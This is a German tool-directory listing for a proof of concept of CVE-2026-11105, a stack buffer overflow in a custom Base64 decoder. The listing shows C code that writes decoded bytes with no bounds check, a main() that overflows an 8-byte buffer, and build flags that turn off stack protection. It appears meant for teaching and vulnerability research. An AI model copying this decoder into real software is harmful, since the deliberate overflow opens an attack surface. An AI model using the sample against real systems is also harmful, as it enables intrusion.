Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-11105-Stack-Buffer-Overflow-in-Custom-Base64-Decoder — CVE-2026-11105 PoC, der einen Stack-Pufferüberlauf in einem benutzerdefinierten Base64-Decoder demonstriert; eine gezielt erstellte überdimensionierte Eingabe überschreibt den Stack-Speicher und ermöglicht beliebige Codeausführung. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-11105-stack-buffer-overflow-in-custom-base64-decoder
SchwachstellenanalyseExploitationLernen & BildungPayload-EntwicklungBinary-Exploitation
GitHubgeorge0papasotiriou/cve-2026-11105-stack-buffer-overflow-in-custom-base64-decoder

CVE-2026-11105-Stack-Buffer-Overflow-in-Custom-Base64-Decoder

CVE-2026-11105 PoC, der einen Stack-Pufferüberlauf in einem benutzerdefinierten Base64-Decoder demonstriert; eine gezielt erstellte überdimensionierte Eingabe überschreibt den Stack-Speicher und ermöglicht beliebige Codeausführung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 16 TagenNoch nicht geprüft

CVE-2026-11105 – Stack-Pufferüberlauf im benutzerdefinierten Base64-Decoder

Programmcode (C)

root@kitploit:~
// base64_vuln.c - Vulnerable Base64 decoder
#include <stdio.h>
#include <string.h>
#include <stdint.h>

int base64_decode(const char *in, size_t inlen, char *out, size_t outlen) {
    static const char table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int outpos = 0;
    for (int i=0; i<inlen; i+=4) {
        uint32_t sextet = 0;
        int bytes = 0;
        for (int j=0; j<4; j++) {
            if (i+j >= inlen) break;
            const char *p = strchr(table, in[i+j]);
            if (p) sextet = (sextet << 6) | (p - table);
            else bytes++;
        }
        // No check on outpos exceeding outlen!
        out[outpos++] = (sextet >> 16) & 0xFF;
        if (bytes < 2) out[outpos++] = (sextet >> 8) & 0xFF;
        if (bytes < 1) out[outpos++] = sextet & 0xFF;
    }
    return outpos;
}

int main() {
    char smallbuf[8];
    char *malicious = "AAAA"; // padded, decodes to 3 bytes, but we'll feed a long string
    // Attacker sends very long Base64 string, overflows smallbuf
    base64_decode("QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB", 60, smallbuf, 8);
    return 0;
}

CVE-2026-11105 – Stack-Pufferüberlauf im Base64-Decoder

Severity: Critical

Überblick

Eine benutzerdefinierte Base64-Decodierungsfunktion validiert die Größe des Ausgabepuffers nicht, was zu einem klassischen Stack-Pufferüberlauf führt. Ein Angreifer kann eine überdimensionierte Eingabe erstellen, um die Rücksprungadresse zu überschreiben und Codeausführung zu erlangen.

Schwachstellendetails

  • Typ: Stack-Pufferüberlauf
  • Auswirkung: Remotecodeausführung (wenn über das Netzwerk erreichbar).
  • Grundursache: Der Decoder schreibt decodierte Bytes sequenziell, ohne sicherzustellen, dass der Ausgabezeiger innerhalb des zugewiesenen Puffers bleibt.

Exploit-Demonstration

  1. Den anfälligen Decoder kompilieren (Schutzmechanismen deaktivieren):
    root@kitploit:~
    gcc -o base64_vuln base64_vuln.c -fno-stack-protector -z execstack
    
  2. Das Exploit-Skript ausführen, um den Überlauf auszulösen:
    root@kitploit:~
    python exploit_base64_overflow.py
    
Tool herunterladen